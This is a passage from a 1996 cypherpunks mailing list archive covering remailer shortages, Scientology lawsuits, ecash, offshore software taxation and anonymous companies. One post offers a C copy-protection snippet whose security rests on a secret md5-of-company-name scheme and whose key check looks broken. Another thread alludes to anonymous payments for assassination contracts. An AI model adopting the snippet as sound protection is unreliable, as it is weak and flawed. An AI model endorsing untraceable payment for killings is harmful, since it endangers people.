know where they live - after all, _it_ doesn't have tax forms to fill out,
and it doesn't care where Fred@Foomail.fi or JaneDoe@mailbox.Jersey.uk lives.
If Yankees or US companies owned Aliceco and Caribsoft, they'd presumably
have to report it for taxes if it made money, but a local owner making
a few percent is in a different position.

Now, the US government _could_ declare a 50% import duty on imported software
(avoiding the uncollectability of income tax) which would of course be evaded.
The government could respond to this by requiring all software
to include a serial # and the TaxID number of the vendor 
(if the vendor is an importer, then she'd have to have Customs Receipts
or other documentation of US origin to expense her costs for tax purposes.)

In this environment, the employees would have to remain unknown to the US,
but might be known to the Aliceco  or Caribsoft.  Of course, Alice may be a Fed,
or Caribsoft employee Paul may be a Plant, so there are
some benefits to pseudonymity; depends on how paranoid you need to be.

Or they could declare Anguilla to be an Economic-Terrorist Enemy,
covered by the Trading With The Enemies (Especially Cuba) Act.
Restricting acceptance of foriegn digicash would be difficult.
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215
# goodtimes signature virus innoculation







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz
Date: Sat, 18 May 1996 08:21:12 +0800
To: cypherpunks@toad.com
Subject: Re: Any DLL's that handle Public Key Encryption or Key Exchange?
Message-ID: <199605161240.AAA20024@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


Tall men in dark suits made draven@infi.net (Greg Morgan) write:
 
>I'm in the process of writing a freeware IRC client in Visual Basic 3 and
>wanted to encorporate a secure variant of DCC chat.  Trouble is I can't find a
>precompiled library that has either RSA or DH in it. This doesn't do me much
>good as I don't even own a Windows C compiler... (is that a crime in some
>countries? :) )
 
The next release of my encryption library (currently available as
ftp://garbo.uwasa.fi/pc/security/crypl110.zip) will contain a nice fast RSA
implementation.  It includes 16 and 32-bit DLL's.  Actually the current version
has support for it, but I took out the code because the key management routines
weren't ready yet.
 
There are two things worth noting, the first is that RSA itself isn't much use
without a *lot* of key management code (which is what's holding up the
RSA-enabled version).  The second is that if you're in the US you're probably
going to run into legal hassles using this code unless someone wants to do an
alternative RSAREF implementation which you can plug in in place of the
existing RSA code.
 
Peter.
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sat, 18 May 1996 20:24:24 +0800
To: cypherpunks@toad.com
Subject: RUL_net
Message-ID: <199605170114.BAA08578@pipe5.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   May-June, 1996, Harvard Business Review. Two related 
   articles which examine c'punks interests -- proposed 
   business regulation of the Net; on-line security; 
   copyright; encryption; authentication; E-cash; electronic 
   commerce; protected communities to escape "frontier 
   anarchy." 
 
   Executive summaries by HBR: 
 
 
   "Ruling the Net." Debora Spar and Jeffrey J. Bussgang 
 
   The Internet promises a radical new world of business. But 
   for many companies, it has yet to deliver. Although doing 
   business in cyberspace may be novel and exhilarating, it 
   can also be frustrating, confusing, and even unprofitable. 
 
   Debora Spar and Jeffrey Bussgang argue that the problems 
   companies face have little to do with a lack of technology 
   or imagination. Their problems stem instead from a lack of 
   rules. Without the order that rules create, business cannot 
   be conducted. 
 
   The authors explain why the informal rules that have 
   developed on the Internet since the 1960s are no longer 
   sufficient. Businesses thinking of allowing millions of 
   dollars of transactions to occur on the wide-open Net need 
   specific assurances. They require clear definitions of 
   property rights, a safe and useful means of exchange, and 
   a way to locate and punish violators of on-line rules. 
 
   The authors believe that the key to commerce on the 
   Internet lies in the creation of managed on-line 
   communities. Such communities can be formed by service 
   providers -- entities that will restrict on-line options, 
   fine-tune offerings to match a select group of users, and 
   provide some means of recourse in cases of fraud or abuse. 
   Under those conditions, they will draw new companies 
   on-line and increase the productivity of those already 
   there. And, say the authors, the rewards for service 
   providers will be substantial: Companies that make the 
   rules on the Internet's emerging frontier have the 
   opportunity to reap the greatest profits. [40 kb] 
 
 
   "The Real Value of On-Line Communities." Arthur Armstrong 
   and John Hagel III 
 
   The notion of community has been at the heart of the 
   Internet since its early days, when scientists used it to 
   share data, collaborate on research, and exchange messages. 
   But how can businesses best use its community-building 
   capabilities? Not merely by putting their products or 
   services on-line, the authors contend. Real value will come 
   from providing people with the ability to interact with one 
   another -- from satisfying their multiple social needs as 
   well as their commercial needs. Companies that create 
   strong on-line communities will command customer loyalty to 
   a degree hitherto undreamed of and, consequently, will 
   generate strong economic returns. 
 
   The authors present four different types of community: 
   communities of transaction, interest, fantasy, and 
   relationship. Examples of each type already can be found on 
   the Internet or through on-line services, but the 
   successful community of the future will incorporate all 
   four -- or as many as possible. As for economic value, the 
   authors see four ways for a company to generate returns: 
   through usage fees, content fees, transactions and 
   advertising, and synergies with other parts of its 
   business. 
 
   In the near future, new business definitions may emerge 
   around the notion of owning a specific customer segment 
   across the full range of its interests and needs; owning 
   specific products and services may no longer be so 
   important. The authors urge businesses marketing to 
   consumers to make the small investment required to "buy an 
   option" on electronic communities in order to understand 
   both their potential value and the radical changes they may 
   cause. [33 kb] 
 
 
   RUL_net (for the 2) 
 
   ----- 
 
   Reprints of "Ruling," No. 96309 and "Real Value," No. 96301 
   may be ordered from HBR for $5.00 each by email to: 
 
      custserv@cchbspub.harvard.edu 
 
 
 
 
 
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Sat, 18 May 1996 11:22:49 +0800
To: Wei Dai <weidai@eskimo.com>
Subject: Re: marginal cost of ecash transaction
In-Reply-To: <Pine.SUN.3.93.960516174550.3310A-100000@eskimo.com>
Message-ID: <199605170130.DAA11940@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 Wei Dai probably wrote:
>
> That brings up an interesting question.  What is the marginal cost to
> MarkTwain of such a one-cent ecash transaction?  If everyone started
> sending each other these pennies, will MarkTwain go broke? 


Good question.


Speaking unofficially and off-the-top-of-my head, I estimate the
marginal cost to be "really really small".


I mean, if you really want to know the marginal cost of
something you have to determine which costs are considered
marginal and which aren't.  Is Frank O. Trotter's salary a
marginal cost?  I mean, if everyone in the world started sending
each other Mark Twain Bank pennies, MTB might have to hire a
second or third banker-type like Frank to keep an eye on things.


But disregarding such speculation, what is the marginal cost of a
kilobyte or so on Mark Twain Bank's internet connection?  Or
(snicker) a handful of CPU cycles on bank.marktwain.com?


The biggest "marginal cost" is probably the salaries of the
employees who keep those two things running.


Regards,

Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMZvWn0jbHy8sKZitAQH9FAMAzfjFYSG4jjAhHgAzjf8s9YpG6M9NVCm1
PHqHffGtlEL/q+4grPhsLa/5IZuLGbhIOGfuhvDf4/dMM1GpORz+qpbC4RNR3CVp
4LYh4X23UxImIk5EuYd22vjMr+6Y0P4E
=ZJ+m
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Carp <erc@dal1820.computek.net>
Date: Sat, 18 May 1996 07:57:04 +0800
To: perry@piermont.com
Subject: Re: Securing CDROM from piracy
In-Reply-To: <199605152256.SAA03246@jekyll.piermont.com>
Message-ID: <199605170845.EAA07610@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


> Vipul Ved Prakash writes:
> > We have developed a multimedia resource that will be cut on a CD-ROM for
> > retailling. Since we don't have our own distributers newtwork we will be
> > collobarating with another firm for distribution. Is there any way of making
> > sure that the guy doesnt pull a fast on on us? Can we ensure that he cannot 
> > duplicate the thing and start selling it without sharing the profit.
> 
> Since he can read the CD, he can duplicate it.
> 
> I will point out anyone buying a CD can do the same thing.
> 
> > Or alternatively is there any protocol we could follow that will
> > ensure a fair game?
> 
> I can't think of how...

This is the way I did something similar:

		puts("Enter your company name:");
		fgets(company, 80, stdin);
		puts("Please call 1-800-555-1212 for your encryption key:");
		puts("Enter it now:");
		fgets(supplied_key, 80, stdin);
		/* Compute a key based on what the user typed in */
		/* This is using md5 as an example */
		computed_key = md5(company);
		/* Now, compare it with what they typed in */
		if(strcmp(supplied_key, computed_key) != 0)
		{
			puts("Incorrect key!");
			exit(1);
		}
		...

As long as you keep the way you compute the key a secret, there's little 
chance that someone else could rip you off, since the key is 
implementation-dependent.
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 18 May 1996 06:50:56 +0800
To: cypherpunks@toad.com
Subject: Re: The Crisis with Remailers
Message-ID: <199605171602.JAA10169@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  8:37 PM 5/15/96 -0700, Timothy C. May wrote:
>A much richer ecology of remailers is sorely needed. A factor of at least
>10 or 20 more (100-300 remailer sites), less reliance on specific sites, an
>"everyone a remailer" capability (which has many elegant advantages!), more
>traffic, temporarily instantiated sites, digital postage, greater ease of
>use (especially with crypto and chaining), and such things as nominal
>terminal remailers choosing to add their own hops (so as to lessen their
>own target potential). Having some of these improvements will be a big
>help.

Perhaps what is needed is a non-profit, charitable 501c foundation to
encourage anonymous communication.  Those who support the idea could make
tax deductible contributions which would be used for grants, public
education etc. etc. to encourage anonymous communication.  It could be
called, "The Federalist Foundation" because the Federalist Papers were
published anonymously.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Sun, 19 May 1996 04:11:42 +0800
To: cypherpunks@toad.com
Subject: Re: SEVERE undercapacity, we need more remailer servers FAST
Message-ID: <2.2.32.19960517170447.00a9b780@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:38 PM 5/16/96 -0500, snow <snow@smoke.suba.com> wrote:
[snip]
>	No, rich is a good excuse for _not_ doing it, unless it can be
>done with total anonymity. If I set up a remailer, on my home computer, as
>an individual, then I am a very little target. I have nothing (well, damn
>little) for anyone to sue me over. What would be the point? They threaten
>to sue me for what? They would spend FAR more than they could ever get out
>of me, and as long as I don't violate any laws, I _might_ be able to get
>"big guns" like the ACLU, EFF etc. on my side to make it a nasty fight for
>no return. 
[snip]

This assumes that they are trying to win.

Hubbard said, "The purpose of the suit is to harass..."

CoS has a huge legal coffer, and they've used it against people who weren't
rich before.  They're not after the money from the lawsuits, IMHO -- it's
miniscule compared to the amount they make in their bait-and-switch scheme
(where they sell people on Dianetics and then lead them down the path to
ridiculous OT powers).  That's what they're fighting to protect.

>From this perspective, the person without money is a much easier target,
IMHO -- they don't have the resources to fight back against sustained and
intense legal pressure (as well as illegal harassment by PI's and other
agents) and will probably cave.  That's the return.

Judge Brinkema, in an opinion last November in the "Church's" case against
the Washington Post, DGS, and Arnie Lerma, wrote:

  "The Court finds that the motivation of plaintiff in filing
   this lawsuit against the Post is reprehensible.  Although
   the RTC brought the complaint under traditional secular
   concepts of copyright and trade secret law, it has become
   clear that a much broader motivation prevailed--the stifling
   of criticism and dissent of the religious practices of
   Scientology and the destruction of its opponents.  L. Ron
   Hubbard, the founder of Scientology, has been quoted as
   looking upon law as a tool to

                [h]arass and discourage rather than to win.
                The law can be used very easily to harrass and
                enough harrassment on somebody who is simply on
                the thin edge anyway, well knowing that he is
                not authorized, will generally be sufficient
                to cause his professional decease.  If 
                possible, of course, ruin him utterly."

CoS are the biggest threat to the remailers right now, and it's a mistake to
view their use of the legal system  based on how you or I might use it --
their purpose is to crush their opposition by whatever means necessary.
They have to handle things that way, because Hubbard said so.  Paulette
Cooper, whose "crime" was writing a book critical of CoS, had 19 lawsuits
filed against her at the same time by the "Church."

Your plan would work if tons of people set up remailers, but barring that,
rich people are actually worse targets for CoS, IMHO, as they have the
resources to fight back, especially if the suit doesn't have any merits.
And the support of the "big guns" is definitely dicey -- they've not
provided counsel for any defendant in a CoS case, AFAIK.  Groups like ACLU
and EFF don't have the resources to deal with every problem they'd like to,
and people shouldn't expect to be rescued by them (you said _might_, I know :)

I would encourage anyone who is concerned about the remailers, that doesn't
have much info on CoS' legal tactics, to spend some time on
alt.religion.scientology or on Ron Newman's excellent web site
http://www.cybercom.net/~rnewman/scientology/home.html (he has a ton of info
there and you can do Excite searches).

I think that if people are not willing to stand up to CoS, the remailers are
history.



Rich

______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Sun, 19 May 1996 03:08:48 +0800
To: cypherpunks@toad.com
Subject: Re:  SEVERE undercapacity, we need more remailer servers FAST
Message-ID: <2.2.32.19960517171832.00ab0b9c@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:02 PM 5/15/96 -0800, jim bell <jimbell@pacifier.com> wrote:
[snip]
>The copyright issue is probably irrelevant to the Scientology dispute, 
>anyway.  The material on which the copyright is claimed almost certainly 
>wasn't marked, appropriately, as it would have had to be for the copyright 
>to be valid.  While current law no longer requires the "circle-C" notation 
>long used for this purpose, the material involved is far more than old 
>enough to have been subject to this requirement, and once a copyright is 
>lost (or not claimed) I believe it couldn't be regained.

I think you're wrong about that.  You're confusing copyrights and
trademarks, I believe.  It's a trademark that you lose by not asserting it
or defending it.  Someone please correct me if I have this wrong :)

There have been claims that the copyrights were not transferred properly
from Hubbard to RTC, but they have yet to be proven in court.

CoS won against Arnie Lerma in a summary judgement.  Copyrights were
definitely the issue in that decision.

>The threat to remailers is one of the many reasons the Leahy bill sucked, 
>and that would have made it worse by imposing criminal sanctions on this 
>kind of thing.  Ironically, with the way remailers are used, it would 
>actually have been possible for some copyright holder to fabricate a 
>violation of copyright law by posting his own material through remailers, 
>and then sue the final remailer, or have its owner prosecuted.

The ugly provision in the Leahy bill had to do with obstruction of criminal
investigations, didn't it?  The CoS copyright cases have all been civil.  I
don't see how it applies.

>I'm glad the people around here finally saw the light.

That part of the bill stunk, I agree...


Rich
______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 18 May 1996 20:36:58 +0800
To: bryce@digicash.com
Subject: Re: Why does the state still stand:
Message-ID: <199605171736.KAA19396@newmail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:09 AM 5/16/96 +0200, bryce@digicash.com wrote:
>
> The entity calling itself jim bell <jimbell@pacifier.com>
> is alleged to have written:
>> 
>> But what I'm looking for is full payee/payor anonymity.  (three guesses as 
>> to why...)   Can you do this?  If not, why not?
>
>
>Let me get this straight.  You are asking for full payee/payor
>anonymity so that you can institute a program of anonymous 
>assassination contracts, right?

It's not just for me.  I seem to recall a comment around here (Tim May, 
perhaps?) who said that when he first read of digital cash in the late 
1980's, the feature of payee anonymity was present, and that he was 
surprised later to see early implementations not containing this.

Deal with the devil?

Any "complete" digital cash implementation has to provide for payee anonymity.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 19 May 1996 05:25:53 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: The Crisis with Remailers
In-Reply-To: <adbfebe7040210046482@[205.199.118.202]>
Message-ID: <199605171738.KAA05800@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


so list attention turns once again to a looming remailer "crisis"...


where are there so few remailers? the reasons are pretty obvious.
these problems have been transparently apparent from the very 
beginning.

1. there is no economic incentive.

as soon as there is a good economic incentive to run remailers, you
will see them proliferate. but currently they have no virtually
no value to the creator. it's like building a house for other people
to live in out of humanitarianism. note that with web pages, you
are buying free publicity for your company. but in fact you are
typically buying yourself *negative* publicity by running a remailer.

what is the current incentive to run remailers? answer: adulation
by other cypherpunks. hmmm, not necessarily all that motivating
to very many.

2. there is no good way to deal with spams or other so-called "abuse"

I commend the remailer operators for starting a mailing list to
deal with spam. but the solution remains essentially "stop
spam by hand". spammers still have the ability to be a serious
threat to the network. this has been a threat from the beginning
and has never been resolved. note that "spam avoidance" is a
very, very difficult problem that plagues far more than remailers,
such as mailing lists and usenet. but it is particularly acute
with remailers.

3. liability

there is a lot of liability to the operator of a remailer, and
again, this risk is totally unsupportable from their current
returns (nil). Hal Finney recently suggested restricting posts
from remailers to avoid copyright liability. this will limit
the liability and risk but does not totally remove it.

4. no need for a network

in fact there is not really a need for a remailer network on one
level. there is only a need if the service is not available. why
is there only one anon.penet.fi? well, because of the above reasons,
and also by the fact that only one is sufficient to serve all of
cyberspace, virtually. what I mean is that there is easily enough
traffic to justify another anon.penet.fi type remailer, but it's
not totally critical (i.e. to the point that someone puts their
resources where their mouth is) as long as anon.penet.fi is running.

5. etc.

==

if people want to know why remailers haven't proliferated  in
the same way that other cyberspace infrastructure has in the
past, such as news servers and web sites, you have to focus on
the above issues. remailers are NOT like other cyberspace services.
they are a tremendous burden to run, instead of being of high
use to the maintainer (even though they don't generate cash)
in the way a web page or usenet server is.

the main problem, getting cash for the service, is slowly dissolving
to the point that it will not be an obstacle. I predict that 
remailers (and many other unusual services) may begin to proliferate
at that point-- but not as much as other areas of cyberspace such
as the web. remailers are always going to be plagued by the other
problems I mentioned above unless some really brilliant genius
comes along to solve what seems to be the unsolvable.

another tact the cypherpunks might take to get anonymity into 
the cyberspace infrastructure is to target forum architecture.
instead of trying to create remailers that "feed into" other
networks, why not build in remailers into those networks themselves?
I am thinking of the way NNTP could be a massive anonymous 
remailer network, and that in fact it was once but that this
was purposely designed against in the protocol (preventing people
from anonymously submitting articles to NNTP hosts).

I propose that as long as there are serious elements involved
in building up cyberspace that are hostile to anonymity, you
are not going to see it flourish in the way other services have.
it seems to me the major obstacles to widespread anonymity
are perceptual, not technological. if people can find a way
to handle the above issues and still provide anonymity, it will
spread. otherwise, I doubt it will ever become very "mainstream".
perhaps the above problems are intrinsic to anonymity, which would
be a pity in my view.

BTW, TCM laments that he hasn't seen master's thesis on remailers.
I consider Lance Cottrell's mixmaster work to be really on that
level, and highly commendable. LC has really advanced remailer
technology by tremendous leaps and bounds since putting his mind
to it. also Levien's remailer page is another very outstanding
service. it is possible that all the real research into remailers
is being done at the NSA <g>

seriously, though, I think cpunks have an opportunity to do some
introspection here. it seems a pretty good rule in cyberspace that
"cool and useful services flourish and grow". witness Usenet
and the web. why haven't the cpunks been able to tap into that
kind of exponential force with remailers? the problems are not
merely technological. I would say the technological problems
associated with the remailers are the most straightforward to
solve. its the complex social issues that are seemingly insurmountable.

I really believe that if anyone wants to get more anonymity in
cyberspace, they must deal head on with the sociological 
"anonymity taboo" in society. why is there a taboo in society
against anonymity? could it be there are some good reasons for it?
is it possible to create a "socially acceptable" anonymity? of
course this line of thinking is going to be utterly repulsive
to some on this list, but I contend it is essential to remailer
growth strategy.

of course if people don't want remailers to ever go "mainstream"
anyway, well then there is no problem. the remailer network still
has an "underground" feeling to it and perhaps that will always
be part of its draw, and its actual structure.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an616864@anon.penet.fi
Date: Sat, 18 May 1996 20:00:04 +0800
To: cypherpunks@toad.com
Subject: test
Message-ID: <9605171052.AA20849@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


test

--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: molecul1@molecule1.com (Molecule One Scientific Research Institute)
Date: Sat, 18 May 1996 20:41:24 +0800
To: Cathay Pacific Marketing Los Angeles <mail1@cathay-usa.com>
Subject: Re: CyberTraveler Auction  - Unsubscrive MoleKule's.
Message-ID: <m0uKTvB-0008b4C@powergrid.electriciti.com>
MIME-Version: 1.0
Content-Type: text/plain


>This is an automated reply to your e-mail request.
>
>The only way to remove yourself from our CyberTraveler 
>program is to go to 
>
>http://www.cathay-usa.com/remove.html (make sure you spell this exactly like
>this)
>
>
>and follow the easy instructions.
>
>
>Thank you for your participation.
>
>
>
>At 06:45 PM 5/16/96 -0700, you wrote:
>>>Dear Molecule,
>>>
>>>
>>>Best regards,
>>>Cathay Pacific Airways Limited
>>>Los Angeles Marketing Department
>>>
>>>P.S. remove yourself from the CyberTraveler program, (should you wish to).
>>>Simply go to http://www.cathay-usa.com/remove.html.  Thank you.
>>>
>>>>>Dear Cathay,
>>>
>>>>>   Unsubscrive Molecule1@electriciti.com
>>>
>>>>>   In peace & wish the purest of wishes.
>>                                                                        
>>>>>                                                  sincerely,
>>>>>                                                            M1.
>>
>>
>>>>> Peace Cathay,
>>>>>    Please note molecul1@electriciti.com is now molecul1@molecule1.com.
>>>>>    It is also 1996 & the people love to dance the world over.  Peace
Cathay,
                                                                            
                                                          M1.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Carp <erc@dal1820.computek.net>
Date: Sat, 18 May 1996 21:35:40 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: The Crisis with Remailers
In-Reply-To: <adbfebe7040210046482@[205.199.118.202]>
Message-ID: <199605171622.MAA20895@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


> A much richer ecology of remailers is sorely needed. A factor of at least
> 10 or 20 more (100-300 remailer sites), less reliance on specific sites, an
> "everyone a remailer" capability (which has many elegant advantages!), more
> traffic, temporarily instantiated sites, digital postage, greater ease of
> use (especially with crypto and chaining), and such things as nominal
> terminal remailers choosing to add their own hops (so as to lessen their
> own target potential). Having some of these improvements will be a big
> help.

I think it would help tremendously if elm or pine were hacked to allow for
remailing.  Even better would be some sort of dynamic remailer addressing
- sendmail certainly doesn't allow for this capability. :( I think we need
something similar to dynamic routing for remailers. 
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Carp <erc@dal1820.computek.net>
Date: Sun, 19 May 1996 01:42:30 +0800
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: Spending a year dead for tax purposes
In-Reply-To: <199605170659.XAA22441@dfw-ix10.ix.netcom.com>
Message-ID: <199605171624.MAA21076@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


> Now, the US government _could_ declare a 50% import duty on imported software
> (avoiding the uncollectability of income tax) which would of course be evaded.
> The government could respond to this by requiring all software
> to include a serial # and the TaxID number of the vendor 
> (if the vendor is an importer, then she'd have to have Customs Receipts
> or other documentation of US origin to expense her costs for tax purposes.)
> 
> In this environment, the employees would have to remain unknown to the US,
> but might be known to the Aliceco  or Caribsoft.  Of course, Alice may be a Fed,
> or Caribsoft employee Paul may be a Plant, so there are
> some benefits to pseudonymity; depends on how paranoid you need to be.
> 
> Or they could declare Anguilla to be an Economic-Terrorist Enemy,
> covered by the Trading With The Enemies (Especially Cuba) Act.
> Restricting acceptance of foriegn digicash would be difficult.

Or they could distribute software electronically and require digital cash
as payment, avoiding the whole issue. 
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Sun, 19 May 1996 02:19:00 +0800
To: Wei Dai <hfinney@shell.portal.com>
Subject: Re: anonymous companies
Message-ID: <199605171837.LAA09867@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:42 PM 5/16/96 -0700, Wei Dai wrote:
>
> I'll just give one problem: the principal-agent problem.  How do owners of
> the company make sure the managers operate the company in their best
> interest?

Actually looting of companies happens a lot right now today, and very
seldom leads to criminal charges.  Twice I have lost a job because the
company I worked for went under, apparently due to looting.

> Solution: reputation.  If the managers don't do the right things, the
> owners arrange so that the managers lose reputation and won't get hired in
> the future.  Unfortunately the science of reputation is not so advanced
> that we know this will actually work.

At present venture capitalists seem to rely on the sniff-their-arses
method.  They talk to people and try and get a feel as to whether they
are planning a robbery.  This method is obviously likely to be less
effectual as businesses move to the net.

This problem is probably the major reason why Net startups are physically 
located in Silicon valley, rather than world wide or nation wide.  Of course
the problem is that if the venture capitalists can find them to sniff
their arses, the bad boys can also find them to shake them down.

In some businesses we can solve this problem by cryptographic control
mechanisms, such as open books banking.  In others, such as net startups,
I see no solution other than increased reliance on personal individual
capital.

Athenian capitalism worked largely on personal capital.  Because of their
terrible arithmetic system, bookkeeping was really bad, and in consequence
stock investments tended to go sour.  Socrates lost a bundle in this 
fashion, which may explain his lack of enthusiasm for capitalists.

> Solution: smart contracts.  This is Nick Szabo's idea of building
> contractual obligations into cryptographic protocols so that the parties
> have no choice but to fullfil them.  But again we don't know whether this
> will actually work for this problem.

It will work for many particular cases of this problem.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 18 May 1996 19:49:27 +0800
To: Senator Exon <remailer@2005.bart.nl>
Subject: Re: your mail
In-Reply-To: <199605160218.EAA03364@spoof.bart.nl>
Message-ID: <Pine.SUN.3.93.960517121604.20628C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 16 May 1996, Senator Exon wrote:

>  14  Q     I see.  So there's something called a
>  15  Cypherpunks list?
>  16  A     Yes.
>  17  Q     Who maintains that?
>  18  A     Major Domo.
>           [majordomo]
>  19  Q     Major Domo is an individual?
>  20  A     No, no.  Major Domo is a bot.
>  21  Q     A what?
>  22  A     A bot.
>  23  Q     What's a bot?
>  24  A     A robot like.  It's short for robot.
>  25  Q     Uh-huh.  And this robot is obviously maintained
>  26  by somebody, right?
> 0050
>  01  A     Not very much.  In fact, it's hardly ever
>  02  touched.
>  03  Q     Where does it sit?
>  04  A     I don't know at this point.  It was a year ago,
>  05  which was about the last time I was reading the
>  06  Cypherpunks list, it was on Hoptoad.
>  07  Q     How would one go about getting the Cypherpunks
>  08  list?
>  09  A     Subscribe Cypherpunks.

Forwarded to : clueless@c2.org

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robin Powell <rpowell@algorithmics.com>
Date: Sat, 18 May 1996 20:12:22 +0800
To: matts@pi.se
Subject: Re: S-Tools 4 now available
In-Reply-To: <2.2.32.19960516202120.0038302c@mail.pi.se>
Message-ID: <96May17.122715edt.20484@janus.algorithmics.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> Matts Kallioniemi <matts@pi.se> writes:

    > It's not just marketing, it's a fact of life. 16 bit operating systems are not
    > supported any more. Just as 8 bit OSes haven't been supported for quite
    > a while either. There will come a day when 64 bits are considered the
    > minimum for useful software (large database systems are already there).

    > You just can't stick with 16 bits forever, MS-free or not. Face it.

EXCUSE ME? I hate all MS products. I run my Amiga 3000.  My OS has
been 32-bit since nineteen eighty fucking nine!  Stick that in your
pipe and smoke it.

-Robin







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Sat, 18 May 1996 21:58:09 +0800
To: cypherpunks@toad.com
Subject: Re: SEVERE undercapacity, we need more remailer servers FAST
In-Reply-To: <Pine.SUN.3.92.960515142902.8511A-100000@kelly.teleport.com>
